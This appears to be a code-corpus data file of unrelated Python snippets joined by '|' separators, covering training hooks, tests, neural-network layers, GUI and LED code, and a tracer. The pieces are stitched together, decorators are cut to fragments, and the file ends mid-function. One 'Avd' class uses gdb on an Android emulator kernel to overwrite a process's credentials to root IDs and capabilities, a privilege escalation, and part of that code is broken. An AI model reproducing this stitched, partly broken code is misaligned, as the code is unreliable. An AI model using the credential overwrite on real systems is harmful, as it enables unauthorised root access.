record_these = [[trainer.loss_tracker.losses, {'input_group_name_for_non_objects': 'loss_histories'}], [trainer.loss_tracker.loss_weights, {'input_group_name_for_non_objects': 'loss_weights'}], [trainer.loss_funcs, {'recursive_types': [torch.nn.Module]}], [trainer.mining_funcs, {}], [trainer.models, {}], [trainer.optimizers, {'custom_attr_func': self.optimizer_custom_attr_func}]]
for (record, kwargs) in record_these:
self.record_keeper.update_records(record, trainer.get_global_iteration(), **kwargs)
def end_of_epoch_hook(self, tester, dataset_dict, model_folder, test_interval=1, patience=None, splits_to_eval=None, test_collate_fn=None):
if (self.primary_metric not in tester.accuracy_calculator.get_curr_metrics()):
raise ValueError('HookContainer `primary_metric` must be one of: {}'.format(tester.accuracy_calculator.get_curr_metrics()))
if (not os.path.exists(model_folder)):
os.makedirs(model_folder)
def actual_hook(trainer):
continue_training = True
if ((trainer.epoch % test_interval) == 0):
best_epoch = self.save_models_and_eval(trainer, dataset_dict, model_folder, test_interval, tester, splits_to_eval, test_collate_fn)
continue_training = self.patience_remaining(trainer.epoch, best_epoch, patience)
return continue_training
return actual_hook
def end_of_testing_hook(self, tester):
for (split_name, accuracies) in tester.all_accuracies.items():
epoch = accuracies['epoch']
self.record_keeper.update_records(accuracies, epoch, input_group_name_for_non_objects=self.record_group_name(tester, split_name))
(_, _, best_epoch, best_accuracy) = self.is_new_best_accuracy(tester, split_name, epoch)
best = {'best_epoch': best_epoch, 'best_accuracy': best_accuracy}
self.record_keeper.update_records(best, epoch, input_group_name_for_non_objects=self.record_group_name(tester, split_name))
def load_latest_saved_models(self, trainer, model_folder, device=None, best=False):
if (device is None):
device = torch.device(('cuda' if torch.cuda.is_available() else 'cpu'))
(resume_epoch, model_suffix) = c_f.latest_version(model_folder, 'trunk_*.pth', best=best)
if (resume_epoch > 0):
for obj_dict in [getattr(trainer, x, {}) for x in self.saveable_trainer_objects]:
c_f.load_dict_of_models(obj_dict, model_suffix, model_folder, device, log_if_successful=True)
return (resume_epoch + 1)
def save_models(self, trainer, model_folder, curr_suffix, prev_suffix=None):
if self.do_save_models:
for obj_dict in [getattr(trainer, x, {}) for x in self.saveable_trainer_objects]:
c_f.save_dict_of_models(obj_dict, curr_suffix, model_folder)
if (prev_suffix is not None):
c_f.delete_dict_of_models(obj_dict, prev_suffix, model_folder)
def save_models_and_eval(self, trainer, dataset_dict, model_folder, test_interval, tester, splits_to_eval=None, collate_fn=None):
epoch = trainer.epoch
tester.test(dataset_dict, epoch, trainer.models['trunk'], trainer.models['embedder'], splits_to_eval, collate_fn)
(prev_best_epoch, _) = self.get_best_epoch_and_accuracy(tester, self.validation_split_name)
(is_new_best, curr_accuracy, best_epoch, best_accuracy) = self.is_new_best_accuracy(tester, self.validation_split_name, epoch)
self.record_keeper.save_records()
trainer.step_lr_plateau_schedulers(curr_accuracy)
self.save_models(trainer, model_folder, epoch, (epoch - test_interval))
if is_new_best:
c_f.LOGGER.info('New best accuracy! {}'.format(curr_accuracy))
curr_suffix = ('best%d' % best_epoch)
prev_suffix = (('best%d' % prev_best_epoch) if (prev_best_epoch is not None) else None)
self.save_models(trainer, model_folder, curr_suffix, prev_suffix)
return best_epoch
def is_new_best_accuracy(self, tester, split_name, epoch):
curr_accuracy = self.get_curr_primary_metric(tester, split_name)
(best_epoch, best_accuracy) = self.get_best_epoch_and_accuracy(tester, split_name)
is_new_best = False
if ((curr_accuracy > best_accuracy) or (best_epoch is None)):
(best_epoch, best_accuracy) = (epoch, curr_accuracy)
is_new_best = True
return (is_new_best, curr_accuracy, best_epoch, best_accuracy)
def get_loss_history(self, loss_names=()):
columns = ('*' if (len(loss_names) == 0) else ', '.join(loss_names))
table_name = 'loss_histories'
if (not self.record_keeper.table_exists(table_name)):
return {}
output = self.record_keeper.query('SELECT {} FROM {}'.format(columns, table_name), return_dict=True)
output.pop('id', None)
return output
def get_accuracy_history(self, tester, split_name, return_all_metrics=False, metrics=()):
table_name = self.record_group_name(tester, split_name)
if (not self.record_keeper.table_exists(table_name)):
return {}
def get_accuracies(keys):
keys = ('*' if return_all_metrics else ('epoch, %s' % keys))
query = 'SELECT {} FROM {}'.format(keys, table_name)
return self.record_keeper.query(query, return_dict=True)
keys = (metrics if (len(metrics) > 0) else [self.primary_metric])
output = self.try_keys(keys, tester, get_accuracies)
output.pop('id', None)
return output
def get_curr_primary_metric(self, tester, split_name):
def get_curr(key):
return tester.all_accuracies[split_name][key]
return self.try_primary_metric(tester, get_curr)
def try_keys(self, input_keys, tester, input_func):
for average in [True, False]:
keys = ', '.join([tester.accuracies_keyname(k, average=average, label_hierarchy_level=tester.label_hierarchy_level) for k in input_keys])
try:
return input_func(keys)
except (KeyError, sqlite3.OperationalError):
pass
raise KeyError
def try_primary_metric(self, tester, input_func):
return self.try_keys([self.primary_metric], tester, input_func)
def get_accuracies_of_epoch(self, tester, split_name, epoch, select_all=True):
table_name = self.record_group_name(tester, split_name)
if (not self.record_keeper.table_exists(table_name)):
return []
def get_accuracies(key):
columns = ('*' if select_all else ('epoch, %s' % key))
query = ('SELECT %s FROM %s WHERE epoch=?' % (columns, table_name))
return self.record_keeper.query(query, (epoch,))
return self.try_primary_metric(tester, get_accuracies)
def get_accuracies_of_best_epoch(self, tester, split_name, select_all=True, ignore_epoch=((- 1),)):
table_name = self.record_group_name(tester, split_name)
if (not self.record_keeper.table_exists(table_name)):
return ([], None)
def get_accuracies(key):
columns = ('*' if select_all else ('epoch, %s' % key))
params = ', '.join((['?'] * len(ignore_epoch)))
query = 'SELECT {0} FROM {1} WHERE {2}=\n (SELECT max({2}) FROM {1} WHERE epoch NOT IN ({3}))\n AND epoch NOT IN ({3})'.format(columns, table_name, key, params)
output = self.record_keeper.query(query, (ignore_epoch + ignore_epoch))
return (output, key)
return self.try_primary_metric(tester, get_accuracies)
def get_best_epoch_and_accuracy(self, tester, split_name, ignore_epoch=((- 1),)):
(accuracies, key) = self.get_accuracies_of_best_epoch(tester, split_name, select_all=False, ignore_epoch=ignore_epoch)
if (len(accuracies) > 0):
return (accuracies[0]['epoch'], accuracies[0][key])
return (None, 0)
def patience_remaining(self, epoch, best_epoch, patience):
if ((patience is not None) and (best_epoch is not None)):
if ((epoch - best_epoch) > patience):
c_f.LOGGER.info('Validation accuracy has plateaued. Exiting.')
return False
return True
def run_tester_separately(self, tester, dataset_dict, epoch, trunk, embedder, splits_to_eval=None, collate_fn=None, skip_eval_if_already_done=True):
if skip_eval_if_already_done:
splits_to_eval = self.get_splits_to_eval(tester, dataset_dict, epoch, splits_to_eval)
if (len(splits_to_eval) == 0):
c_f.LOGGER.info('Already evaluated')
return False
tester.test(dataset_dict, epoch, trunk, embedder, splits_to_eval, collate_fn)
return True
def get_splits_to_eval(self, tester, dataset_dict, epoch, input_splits_to_eval):
input_splits_to_eval = (list(dataset_dict.keys()) if (input_splits_to_eval is None) else input_splits_to_eval)
splits_to_eval = []
for split in input_splits_to_eval:
if (len(self.get_accuracies_of_epoch(tester, split, epoch)) == 0):
splits_to_eval.append(split)
return splits_to_eval
def base_record_group_name(self, tester):
base_record_group_name = (('%s_' % self.record_group_name_prefix) if self.record_group_name_prefix else '')
base_record_group_name += tester.description_suffixes('accuracies')
return base_record_group_name
def record_group_name(self, tester, split_name):
base_record_group_name = self.base_record_group_name(tester)
query_set_label = split_name.upper()
reference_sets_label = '_and_'.join([name.upper() for name in sorted(tester.reference_split_names[split_name])])
if (reference_sets_label == query_set_label):
reference_sets_label = 'self'
return f'{base_record_group_name}_{query_set_label}_vs_{reference_sets_label}'
def optimizer_custom_attr_func(self, optimizer):
return {'lr': optimizer.param_groups[0]['lr']} |
.parametrize('message', ['Undefined name `os`', "F821 undefined name 'numpy'", "undefined name 'numpy'"])
def test_autoimport_code_actions_get_correct_module_name(autoimport_workspace, message):
source = "os.path.join('a', 'b')"
autoimport_workspace.put_document(DOC_URI, source=source)
doc = autoimport_workspace.get_document(DOC_URI)
diagnostic = {'range': {'start': {'line': 0, 'character': 0}, 'end': {'line': 0, 'character': 2}}, 'message': message}
module_name = get_name_or_module(doc, diagnostic)
autoimport_workspace.rm_document(DOC_URI)
assert (module_name == 'os') |
def get_date_diff_display(start, end):
if (end.year != start.year):
return f"{start.strftime('%d %b %Y')} - {end.strftime('%d %b %Y')}"
if (end.month != start.month):
return f"{start.strftime('%d %b')} - {end.strftime('%d %b')}, {start.year}"
if (end.day != start.day):
return f"{start.strftime('%d')} - {end.strftime('%d')} {start.strftime('%b')}, {start.year}"
if isinstance(start, dt.date):
return f"{start.strftime('%d %b %Y')}"
if (end.strftime('%p') != start.strftime('%p')):
return f"{start.strftime('%I:%M%p')} - {end.strftime('%I:%M%p')}, {start.strftime('%d %b %Y')}"
return f"{start.strftime('%I:%M')} - {end.strftime('%I:%M')}{start.strftime('%p, %d %b %Y')}" |
class OptimizedWildRelNet(tf.keras.Model):
def __init__(self, edge_mlp=gin.REQUIRED, graph_mlp=gin.REQUIRED, dropout_in_last_graph_layer=gin.REQUIRED, name='OptimizedWildRelNet', **kwargs):
super(OptimizedWildRelNet, self).__init__(name=name, **kwargs)
edge_layers = []
for num_units in edge_mlp:
edge_layers += [tf.keras.layers.Dense(num_units, activation=get_activation(), kernel_initializer=get_kernel_initializer())]
self.edge_layer = tf.keras.models.Sequential(edge_layers, 'edge_mlp')
graph_layers = []
for num_units in graph_mlp:
graph_layers += [tf.keras.layers.Dense(num_units, activation=get_activation(), kernel_initializer=get_kernel_initializer())]
if dropout_in_last_graph_layer:
graph_layers += [tf.keras.layers.Dropout((1.0 - dropout_in_last_graph_layer), noise_shape=[1, 1, graph_mlp[(- 1)]])]
graph_layers += [tf.keras.layers.Dense(1, kernel_initializer=get_kernel_initializer())]
self.graph_layer = tf.keras.models.Sequential(graph_layers, 'graph_mlp')
self.stacking_layer = relational_layers.StackAnswers()
self.wildrelnet = tf.keras.models.Sequential([relational_layers.AddPositionalEncoding(), relational_layers.RelationalLayer(self.edge_layer, tf.keras.layers.Lambda((lambda x: tf.reduce_sum(x, axis=(- 2))))), tf.keras.layers.Lambda((lambda x: tf.reduce_sum(x, axis=(- 2)))), self.graph_layer, tf.keras.layers.Lambda((lambda x: tf.reduce_sum(x, axis=(- 1))))], 'wildrelnet')
def call(self, inputs, **kwargs):
(context_embeddings, answer_embeddings) = inputs
stacked_answers = self.stacking_layer([context_embeddings, answer_embeddings])
return self.wildrelnet(stacked_answers, **kwargs) |
def recursively_load_weights(fairseq_model, hf_model):
unused_weights = []
fairseq_dict = fairseq_model.state_dict()
feature_extractor = hf_model.feature_extractor
for (name, value) in fairseq_dict.items():
is_used = False
if ('conv_layers' in name):
load_conv_layer(name, value, feature_extractor, unused_weights, (hf_model.config.feat_extract_norm == 'group'))
is_used = True
else:
for (key, mapped_key) in MAPPING.items():
mapped_key = mapped_key
if (key in name):
is_used = True
if ('*' in mapped_key):
layer_index = name.split(key)[0].split('.')[(- 2)]
mapped_key = mapped_key.replace('*', layer_index)
if ('weight_g' in name):
weight_type = 'weight_g'
elif ('weight_v' in name):
weight_type = 'weight_v'
elif ('weight' in name):
weight_type = 'weight'
elif ('bias' in name):
weight_type = 'bias'
else:
weight_type = None
set_recursively(hf_model, mapped_key, value, name, weight_type)
continue
if (not is_used):
unused_weights.append(name)
logger.warning(f'Unused weights: {unused_weights}') |
def sphash(coords: torch.Tensor, offsets: Optional[torch.Tensor]=None) -> torch.Tensor:
assert (coords.dtype == torch.int), coords.dtype
assert ((coords.ndim == 2) and (coords.shape[1] == 4)), coords.shape
coords = coords.contiguous()
if (offsets is None):
if (coords.device.type == 'cuda'):
return torchsparse.backend.hash_cuda(coords)
elif (coords.device.type == 'cpu'):
return torchsparse.backend.hash_cpu(coords)
else:
device = coords.device
return torchsparse.backend.hash_cpu(coords.cpu()).to(device)
else:
assert (offsets.dtype == torch.int), offsets.dtype
assert ((offsets.ndim == 2) and (offsets.shape[1] == 3)), offsets.shape
offsets = offsets.contiguous()
if (coords.device.type == 'cuda'):
return torchsparse.backend.kernel_hash_cuda(coords, offsets)
elif (coords.device.type == 'cpu'):
return torchsparse.backend.kernel_hash_cpu(coords, offsets)
else:
device = coords.device
return torchsparse.backend.kernel_hash_cpu(coords.cpu(), offsets.cpu()).to(device) |
def process_rule_environment_table(c, db_id):
c.execute('\nINSERT INTO rule_environment (rule_id, environment_fingerprint_id, radius, num_pairs)\n SELECT rule_map.new_rule_id,\n environment_fingerprint_map.new_environment_fingerprint_id,\n old_rule_environment.radius,\n old_rule_environment.num_pairs\n FROM old.rule_environment AS old_rule_environment,\n rule_map_{db_id} AS rule_map,\n environment_fingerprint_map_{db_id} AS environment_fingerprint_map\n WHERE old_rule_environment.rule_id = rule_map.old_rule_id\n AND old_rule_environment.environment_fingerprint_id =\n environment_fingerprint_map.old_environment_fingerprint_id\n ON CONFLICT (rule_id, environment_fingerprint_id, radius)\n DO UPDATE\n SET num_pairs = num_pairs + excluded.num_pairs\n ;\n '.format(db_id=db_id))
c.execute('\nINSERT INTO rule_environment_map_{db_id} (old_rule_environment_id, new_rule_environment_id)\n SELECT old_rule_environment.id,\n new_rule_environment.id\n FROM old.rule_environment AS old_rule_environment,\n rule_environment AS new_rule_environment,\n rule_map_{db_id} AS rule_map,\n environment_fingerprint_map_{db_id} AS environment_fingerprint_map\n WHERE old_rule_environment.rule_id = rule_map.old_rule_id\n AND new_rule_environment.rule_id = rule_map.new_rule_id\n AND old_rule_environment.radius = new_rule_environment.radius\n AND old_rule_environment.environment_fingerprint_id = \n environment_fingerprint_map.old_environment_fingerprint_id\n AND new_rule_environment.environment_fingerprint_id = \n environment_fingerprint_map.new_environment_fingerprint_id\n '.format(db_id=db_id)) |
class TestLogFilter():
def test_valid(self, parser):
args = parser.parse_args(['--logfilter', 'misc'])
assert (args.logfilter == 'misc')
def test_invalid(self, parser, capsys):
with pytest.raises(SystemExit):
parser.parse_args(['--logfilter', 'invalid'])
(_out, err) = capsys.readouterr()
print(err)
assert ('Invalid log category invalid - valid categories' in err) |
class Rainbow(LedProgram):
def __init__(self, manager: 'DeviceManager') -> None:
super().__init__(manager, 'Rainbow')
self.program_duration = 1
self.time_passed = 0.0
self.current_fraction = 0.0
def start(self) -> None:
self.time_passed = 0.0
def compute(self) -> None:
self.time_passed += ((1 / self.manager.settings['ups']) * self.manager.settings['program_speed'])
self.time_passed %= self.program_duration
self.current_fraction = (self.time_passed / self.program_duration)
def _colors(self, led_count) -> List[Tuple[(float, float, float)]]:
return [colorsys.hsv_to_rgb(hue, 1, 1) for hue in stretched_hues(led_count, self.current_fraction)]
def ring_colors(self) -> List[Tuple[(float, float, float)]]:
return self._colors(self.manager.devices.ring.LED_COUNT)
def wled_colors(self) -> List[Tuple[(float, float, float)]]:
return self._colors(self.manager.devices.wled.led_count)
def strip_color(self) -> Tuple[(float, float, float)]:
return colorsys.hsv_to_rgb(self.current_fraction, 1, 1) |
('mmseg.datasets.CustomDataset.load_annotations', MagicMock)
('mmseg.datasets.CustomDataset.__getitem__', MagicMock(side_effect=(lambda idx: idx)))
def test_custom_dataset_custom_palette():
dataset = CustomDataset(pipeline=[], img_dir=MagicMock(), split=MagicMock(), classes=('bus', 'car'), palette=[[100, 100, 100], [200, 200, 200]], test_mode=True)
assert (tuple(dataset.PALETTE) == tuple([[100, 100, 100], [200, 200, 200]])) |
class VoVGSCSP(nn.Module):
def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5):
super().__init__()
c_ = int((c2 * e))
self.cv1 = Conv(c1, c_, 1, 1)
self.cv2 = Conv(c1, c_, 1, 1)
self.gsb = GSBottleneck(c_, c_, 1, 1)
self.res = Conv(c_, c_, 3, 1, act=False)
self.cv3 = Conv((2 * c_), c2, 1)
def forward(self, x):
x1 = self.gsb(self.cv1(x))
y = self.cv2(x)
return self.cv3(torch.cat((y, x1), dim=1)) |
def prepare_env(args, pm, stage, prefix, cmdlist, output=None):
if (args.verbose > 0):
print('{}'.format(prefix))
for cmdinfo in cmdlist:
if isinstance(cmdinfo, list):
exit_codes = cmdinfo[1:]
cmd = cmdinfo[0]
else:
exit_codes = [0]
cmd = cmdinfo
if (not cmd):
continue
(proc, foutput) = exec_cmd(args, pm, stage, cmd)
if (proc and (proc.returncode not in exit_codes)):
print('', file=sys.stderr)
print('{} *** Could not execute: "{}"'.format(prefix, cmd), file=sys.stderr)
print('\n{} *** Error message: "{}"'.format(prefix, foutput), file=sys.stderr)
print('returncode {}; expected {}'.format(proc.returncode, exit_codes))
print('\n{} *** Aborting test run.'.format(prefix), file=sys.stderr)
print('\n\n{} *** stdout ***'.format(proc.stdout), file=sys.stderr)
print('\n\n{} *** stderr ***'.format(proc.stderr), file=sys.stderr)
raise PluginMgrTestFail(stage, output, '"{}" did not complete successfully'.format(prefix)) |
class RaisesContext(ContextManager[_pytest._code.ExceptionInfo[E]]):
def __init__(self, expected_exception: Union[(Type[E], Tuple[(Type[E], ...)])], message: str, match_expr: Optional[Union[(str, Pattern[str])]]=None) -> None:
self.expected_exception = expected_exception
self.message = message
self.match_expr = match_expr
self.excinfo: Optional[_pytest._code.ExceptionInfo[E]] = None
def __enter__(self) -> _pytest._code.ExceptionInfo[E]:
self.excinfo = _pytest._code.ExceptionInfo.for_later()
return self.excinfo
def __exit__(self, exc_type: Optional[Type[BaseException]], exc_val: Optional[BaseException], exc_tb: Optional[TracebackType]) -> bool:
__tracebackhide__ = True
if (exc_type is None):
fail(self.message)
assert (self.excinfo is not None)
if (not issubclass(exc_type, self.expected_exception)):
return False
exc_info = cast(Tuple[(Type[E], E, TracebackType)], (exc_type, exc_val, exc_tb))
self.excinfo.fill_unfilled(exc_info)
if (self.match_expr is not None):
self.excinfo.match(self.match_expr)
return True |
def get_exchanges_by_ccy(history=True):
if (not history):
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d) |
class SuccessPage(Gtk.Box):
def __init__(self, parent_window):
super().__init__(spacing=10)
self.__parent_window = parent_window
self.grid = Gtk.Grid()
hbox = Gtk.HBox()
previous = Gtk.Button(label=' ')
previous.props.relief = Gtk.ReliefStyle.NONE
previous.set_margin_end(245)
hbox.add(previous)
self.__parent_window.last_onward.set_label('')
for child in self.__parent_window.last_onward.get_children():
child.set_label('<b>Done</b>')
child.set_use_markup(True)
self.__parent_window.last_onward.connect('clicked', self.forward)
hbox.add(self.__parent_window.last_onward)
hbox.set_hexpand(False)
hbox.set_vexpand(False)
hbox.set_margin_bottom(6)
hbox.set_margin_end(25)
scroller = Gtk.ScrolledWindow()
scroller.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.NEVER)
scroller.set_hexpand(True)
scroller.set_vexpand(True)
vbox = Gtk.VBox()
vbox_container = Gtk.VBox()
vbox_container.set_margin_top(55)
vbox_container.set_margin_end(28)
vbox_container.add(scroller)
self.grid.set_margin_start(157)
vbox_container.set_margin_bottom(18)
vbox.set_margin_end(10)
vbox.set_margin_bottom(18)
self.grid.add(vbox_container)
self.grid.attach_next_to(hbox, vbox_container, Gtk.PositionType.BOTTOM, 2, 1)
self.add(self.grid)
self.__parent_window.last_onward.grab_focus()
def forward(self, *args):
self.hide()
self.__parent_window.setupwin.close() |
def unwrap_yielded(yielded: Union[(Block, dict, Iterable)], **kwargs: Any) -> Generator[(dict, None, None)]:
if isinstance(yielded, Block):
(yield dict(iter(yielded)))
elif isinstance(yielded, dict):
(yield yielded)
else:
root = kwargs.get('root', yielded)
parent = kwargs.get('parent', object())
if (isinstance(yielded, Iterable) and (yielded != parent)):
for nested in yielded:
(yield from unwrap_yielded(nested, parent=yielded, root=root))
else:
raise TypeError(f"expected block to be yielded but got {repr(kwargs.get('root', yielded))}") |
class Avd():
_TASKLIST_CMD = ('python', 'a_swapper = {}', 'o_tasks = {}', 'o_pid = {}', "addr = gdb.execute('x/a %d'%(a_swapper + o_tasks), to_string=True).split(':\\t')[1]", 'addr = int(addr, 16) - o_tasks', 'while addr != a_swapper:', " pid = gdb.execute('x/wx %d'%(addr + o_pid), to_string=True).split(':\\t')[1]", " pid = int(pid.replace('\\n', ''), 16)", " print('#%d;%d'%(addr, pid))", " addr = gdb.execute('x/a %d'%(addr + o_tasks), to_string=True).split(':\\t')[1]", ' addr = int(addr, 16) - o_tasks', 'end')
_CAPABILITIES_OFFSETS = [48, 52, 56, 60, 64, 68]
_IDS_OFFSETS = [4, 8, 12, 16, 20, 24, 28, 32, 36]
def __init__(self, device: str, host: str, port: int):
self._tasklist = None
try:
self.device = AdbClient(host=host, port=port).device(device)
except RuntimeError as err:
raise AVDError(err)
if (self.device is None):
raise AVDError("Can't connect to emulator through ADB")
_cache(maxsize=1)
def kernel(self):
config_name = '{}.yaml'.format(self.device.shell('uname -rm').replace(' ', '_').strip())
root_path = Path(__file__).resolve().parent.parent
try:
kernel = Kernel.load((((root_path / 'config') / 'kernel') / config_name), self.device)
except FileNotFoundError:
raise AVDError('Kernel is not supported')
return kernel
def tasklist(self):
if (self._tasklist is not None):
return self._tasklist
debug('Retrieving tasklist from memory')
cmd = '\n'.join(Avd._TASKLIST_CMD).format(self.kernel.swapper_address, self.kernel.config.task.offset.tasklist, self.kernel.config.task.offset.pid)
try:
results = self.kernel.gdb.execute_and_retry(cmd, msg='Wait for kernel memory mapping')
if (len(results) == 0):
info("Can't retrieve tasklist. Updating gdbstub...")
self.kernel.gdb.update()
results = self.kernel.gdb.execute(cmd)
except GdbError as err:
raise AVDError(err)
tasklist = dict()
for result in results:
(addr, pid) = result.get('payload').replace('\\n', '').replace('#', '', 1).split(';')
tasklist[int(pid)] = int(addr)
self._tasklist = (tasklist if (len(tasklist) > 0) else None)
return self._tasklist
def find_process(self, pid: int):
info(f'Kernel base address found at 0x{self.kernel.base_address:x}')
tasklist = self.tasklist
if (tasklist is None):
raise AVDError("Can't retrieve tasklist from emulator memory")
paddr = tasklist.get(int(pid))
if (paddr is None):
raise AVDError("Can't retrieve process descriptor from tasklist")
paddr = tasklist.get(int(pid))
info(f'Process [{pid}] found at 0x{paddr:x}')
return paddr
def get_pid(self, pname: str) -> int:
pids = self.device.shell(f'pidof {pname}').replace('\\n', '').split()
if (len(pids) > 1):
raise AmbiguousProcessNameError()
return (int(pids[0]) if (len(pids) > 0) else None)
def overwrite_credentials(self, pid):
address = (self.find_process(pid) + self.kernel.config.task.offset.creds)
cmd = [f'x/a {address}', 'set $addr = $__']
for offset in Avd._CAPABILITIES_OFFSETS:
cmd.append('set *(unsigned int*) ($addr + {}) = {}'.format(offset, ))
for offset in Avd._IDS_OFFSETS:
cmd.append('set *(unsigned int*) ($addr + {}) = {}'.format(offset, 0))
info(f'Overwriting process [{pid}] credentials')
self.kernel.gdb.execute('\n'.join(cmd))
def selinux_setenforce(self, mode: int):
self.kernel.enforce = mode
def close(self):
try:
self.kernel.gdb.exit()
except AVDError:
pass |
class HFTracer(Tracer):
proxy_buffer_attributes: bool = True
allow_insert_stateless_mods: bool = True
_TORCH_METHODS_TO_PATCH = ['arange', 'zeros', 'ones', 'full', 'full_like', 'eye', 'empty', 'tensor', 'clamp', 'finfo']
def __init__(self, autowrap_modules=(math,), autowrap_functions=()):
super().__init__(autowrap_modules=autowrap_modules, autowrap_functions=autowrap_functions)
if (not is_torch_fx_available()):
torch_version = version.parse(importlib_metadata.version('torch'))
raise ImportError(f'Found an incompatible version of torch. Found version {torch_version}, but only version {TORCH_FX_REQUIRED_VERSION} is supported.')
def _generate_dummy_input(self, model: PreTrainedModel, input_name: str, shape: List[int]) -> Dict[(str, torch.Tensor)]:
model_class_name = getattr(model, 'class_for_deserialization', model.__class__).__name__
device = model.device
inputs_dict = {}
if (input_name in ['labels', 'start_positions', 'end_positions']):
batch_size = shape[0]
if (model_class_name in [*get_values(MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING_NAMES), *get_values(MODEL_FOR_MULTIPLE_CHOICE_MAPPING_NAMES), *get_values(MODEL_FOR_IMAGE_CLASSIFICATION_MAPPING_NAMES), *get_values(MODEL_FOR_BACKBONE_MAPPING_NAMES), *get_values(MODEL_FOR_AUDIO_CLASSIFICATION_MAPPING_NAMES)]):
inputs_dict['labels'] = torch.zeros(batch_size, dtype=torch.long, device=device)
elif (model_class_name in [*get_values(MODEL_FOR_QUESTION_ANSWERING_MAPPING_NAMES), *get_values(MODEL_FOR_DOCUMENT_QUESTION_ANSWERING_MAPPING_NAMES), 'XLNetForQuestionAnswering']):
inputs_dict['start_positions'] = torch.zeros(batch_size, dtype=torch.long, device=device)
inputs_dict['end_positions'] = torch.zeros(batch_size, dtype=torch.long, device=device)
elif (model_class_name in get_values(MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING_NAMES)):
if ((not hasattr(model.config, 'problem_type')) or (model.config.problem_type is None)):
raise ValueError('Could not retrieve the problem type for the sequence classification task, please set model.config.problem_type to one of the following values: "regression", "single_label_classification", or "multi_label_classification".')
if (model.config.problem_type == 'regression'):
labels_shape = (batch_size, model.config.num_labels)
labels_dtype = torch.float32
elif (model.config.problem_type == 'single_label_classification'):
labels_shape = (batch_size,)
labels_dtype = torch.long
elif (model.config.problem_type == 'multi_label_classification'):
labels_shape = (batch_size, model.config.num_labels)
labels_dtype = torch.float32
else:
raise ValueError(f'Expected model.config.problem_type to be either: "regression", "single_label_classification", or "multi_label_classification", but "{model.config.problem_type}" was provided.')
inputs_dict['labels'] = torch.zeros(*labels_shape, dtype=labels_dtype, device=device)
elif (model_class_name in [*get_values(MODEL_FOR_PRETRAINING_MAPPING_NAMES), *get_values(MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING_NAMES), *get_values(MODEL_FOR_CAUSAL_LM_MAPPING_NAMES), *get_values(MODEL_FOR_MASKED_LM_MAPPING_NAMES), *get_values(MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING_NAMES), *get_values(MODEL_FOR_SEMANTIC_SEGMENTATION_MAPPING_NAMES), 'GPT2DoubleHeadsModel']):
inputs_dict['labels'] = torch.zeros(shape, dtype=torch.long, device=device)
elif (model_class_name in [*get_values(MODEL_FOR_CTC_MAPPING_NAMES)]):
inputs_dict['labels'] = torch.zeros(shape, dtype=torch.float32, device=device)
else:
raise NotImplementedError(f'Generating the dummy input named {input_name} for {model_class_name} is not supported yet.')
elif ('pixel_values' in input_name):
batch_size = shape[0]
image_size = getattr(model.config, 'image_size', None)
if (image_size is None):
if hasattr(model.config, 'vision_config'):
image_size = model.config.vision_config.image_size
elif hasattr(model.config, 'encoder'):
image_size = model.config.encoder.image_size
else:
image_size = (_generate_random_int(), _generate_random_int())
num_channels = getattr(model.config, 'num_channels', 3)
if (not isinstance(image_size, collections.abc.Iterable)):
image_size = (image_size, image_size)
(height, width) = image_size
inputs_dict[input_name] = torch.zeros(batch_size, num_channels, height, width, dtype=torch.float32, device=device)
elif ('bbox' in input_name):
inputs_dict[input_name] = torch.zeros(*shape, 4, dtype=torch.float, device=device)
elif ('input_features' in input_name):
inputs_dict[input_name] = torch.zeros(*shape, model.config.input_feat_per_channel, dtype=torch.float, device=device)
elif ('visual_feats' in input_name):
inputs_dict[input_name] = torch.zeros((shape + [model.config.visual_feat_dim]), dtype=torch.float, device=device)
elif ('visual_pos' in input_name):
inputs_dict[input_name] = torch.zeros((shape + [model.config.visual_pos_dim]), dtype=torch.float, device=device)
elif ('inputs' in input_name):
inputs_dict[input_name] = torch.zeros(*shape, dtype=torch.float, device=device)
elif ('input_values' in input_name):
(batch_size, _) = shape
seq_length = _generate_random_int(low=10000, high=20000)
inputs_dict[input_name] = torch.zeros(batch_size, seq_length, dtype=torch.float, device=device)
elif (('mask' in input_name) or ('ids' in input_name)):
inputs_dict[input_name] = torch.zeros(shape, dtype=torch.long, device=device)
else:
shape_with_hidden_size = (shape + [model.config.hidden_size])
inputs_dict[input_name] = torch.zeros(shape_with_hidden_size, dtype=torch.float, device=device)
return inputs_dict
def create_proxy(self, kind, target, args, kwargs, name=None, type_expr=None, proxy_factory_fn=None):
rv = super().create_proxy(kind, target, args, kwargs, name, type_expr, proxy_factory_fn)
if ((kind == 'placeholder') and (target in self.meta_args)):
rv.install_metadata(self.meta_args[target])
return rv
if (target in self.orig_fns):
if ('device' in kwargs):
kwargs['device'] = 'meta'
try:
args_metas = torch.fx.node.map_aggregate(args, _proxies_to_metas)
kwargs_metas = torch.fx.node.map_aggregate(kwargs, _proxies_to_metas)
if (kind == 'call_function'):
meta_target = _MANUAL_META_OVERRIDES.get(target, target)
meta_out = meta_target(*args_metas, **kwargs_metas)
if isinstance(meta_out, torch.Tensor):
meta_out = meta_out.to(device='meta')
elif (kind == 'call_method'):
method = getattr(args_metas[0].__class__, target)
meta_target = _MANUAL_META_OVERRIDES.get(method, method)
meta_out = meta_target(*args_metas, **kwargs_metas)
elif (kind == 'call_module'):
if (not hasattr(self, 'orig_forward')):
raise AttributeError(f'{self} does not have an attribute called orig_forward')
self._disable_module_getattr = True
try:
mod = self.root.get_submodule(target)
mod_type = type(mod)
if (mod_type in _MANUAL_META_OVERRIDES):
meta_out = _MANUAL_META_OVERRIDES[mod_type](mod, *args_metas, **kwargs_metas)
else:
meta_out = self.orig_forward(*args_metas, **kwargs_metas)
finally:
self._disable_module_getattr = False
elif (kind == 'get_attr'):
self._disable_module_getattr = True
try:
attr_itr = self.root
atoms = target.split('.')
for atom in atoms:
attr_itr = getattr(attr_itr, atom)
if isinstance(attr_itr, torch.Tensor):
meta_out = attr_itr.to(device='meta')
else:
meta_out = attr_itr
finally:
self._disable_module_getattr = False
else:
return rv
if (not isinstance(rv, Proxy)):
raise ValueError("Don't support composite output yet")
rv.install_metadata(meta_out)
except Exception as e:
